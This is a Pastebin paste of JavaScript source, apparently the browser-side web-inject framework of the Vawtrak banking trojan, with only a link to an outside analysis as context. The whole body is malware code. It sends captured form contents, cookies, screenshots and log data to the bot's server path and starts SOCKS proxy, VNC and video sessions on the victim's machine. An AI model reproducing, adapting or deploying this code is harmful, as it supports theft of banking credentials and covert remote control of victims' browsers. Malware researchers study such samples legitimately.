Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://stopmalvertising.com/malware-reports/analysis-of-vawtrak.html
- function EQFramework(i) {
- this._Key = i;
- this._LastAsync = null;
- this.Version = 2;
- this.GetXHR = function () {
- if (typeof XMLHttpRequest === 'undefined') {
- XMLHttpRequest = function () {
- try {
- return new ActiveXObject("Msxml2.XMLHTTP.6.0")
- } catch (e) {}
- try {
- return new ActiveXObject("Msxml2.XMLHTTP.3.0")
- } catch (e) {}
- try {
- return new ActiveXObject("Msxml2.XMLHTTP")
- } catch (e) {}
- try {
- return new ActiveXObject("Microsoft.XMLHTTP")
- } catch (e) {}
- return false
- }
- }
- return new XMLHttpRequest()
- };
- this.Query = function (a, b, c, d) {
- var f = this.GetXHR();
- var g = null;
- var h = this;
- Async = (typeof (d) == 'undefined') ? false : true;
- b = '/' + this._Key + '/' + Math.random() + '/' + b;
- if (Async == true) {
- this._LastAsync = null;
- f.onreadystatechange = function () {
- try {
- if (f.readyState == 4) {
- if (f.status != 200 || f.responseText == '-') {
- h._LastAsync = false;
- if (typeof (d) == "function") {
- d(false)
- }
- } else {
- if (f.responseText == '+') {
- h._LastAsync = true;
- if (typeof (d) == "function") {
- d(true)
- }
- } else {
- h._LastAsync = f.responseText;
- if (typeof (d) == "function") {
- d(f.responseText)
- }
- }
- }
- }
- } catch (e) {
- h._LastAsync = false;
- if (typeof (d) == "function") {
- d(false)
- }
- }
- }
- }
- f.open(a, b, Async);
- f.send(c);
- if (Async == true) {
- return true
- }
- try {
- if (f.readyState == 4 && f.status == 200) {
- if (f.responseText == '-') {
- return false
- } else {
- if (f.responseText == '+') {
- return true
- } else {
- return f.responseText
- }
- }
- }
- return false
- } catch (e) {
- return false
- }
- };
- this.GetLastAsync = function () {
- return this._LastAsync
- };
- this.SetVal = function (a, b, c) {
- Url = '1/' + a;
- return this.Query('POST', Url, b, c)
- };
- this.GetVal = function (a, b) {
- Url = '2/' + a;
- return this.Query('GET', Url, null, b)
- };
- this.DelVal = function (a, b) {
- Url = '3/' + a;
- return this.Query('GET', Url, null, b)
- };
- this.ClearVals = function (a) {
- Url = '4/';
- return this.Query('GET', Url, null, a)
- };
- this.GetServer = function (a, b, c) {
- t = (b == true) ? 'S' : 'D';
- return this.Query('GET', '5/' + t + '/' + a, null, c)
- };
- this.PostServer = function (a, b, c, d) {
- t = (b == true) ? 'S' : 'D';
- return this.Query('POST', '5/' + t + '/' + a, c, d)
- };
- this.Get = function (a, b, c, d) {
- t = (b == true) ? 'S' : 'D';
- if (typeof (c) == 'undefined' || c == false) {
- c = null;
- Type = 'GET'
- } else {
- c = 'Cookie: ' + c;
- Type = 'POST'
- }
- return this.Query(Type, '6/' + t + '/' + a, c, d)
- };
- this.Post = function (a, b, c, d) {
- t = (b == true) ? 'S' : 'D';
- return this.Query('POST', '7/' + t + '/' + a, c, d)
- };
- this.ScreenShot = function (a, b, c, d) {
- Url = '8/' + b + '/' + c + '/' + encodeURIComponent(a);
- return this.Query('GET', Url, null, d)
- };
- this.LogAdd = function (a, b) {
- Url = '9/';
- return this.Query('POST', Url, a, b)
- };
- this.UpdateConfig = function (a) {
- Url = '10/';
- return this.Query('GET', Url, null, a)
- };
- this.StartSocks = function (a, b) {
- Url = '11/';
- return this.Query('POST', Url, a, b)
- };
- this.StartVnc = function (a, b) {
- Url = '12/';
- return this.Query('POST', Url, a, b)
- };
- this.SendForm = function (a, b, c) {
- Url = '13/';
- Post = a + "\r\n" + b;
- return this.Query('POST', Url, Post, c)
- };
- this.StartVideo = function (a, b) {
- Url = '14/' + a;
- Data = document.location.href;
- return this.Query('POST', Url, Data, b)
- };
- this.StopVideo = function (a) {
- Url = '15/';
- return this.Query('GET', Url, null, a)
- }
- };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement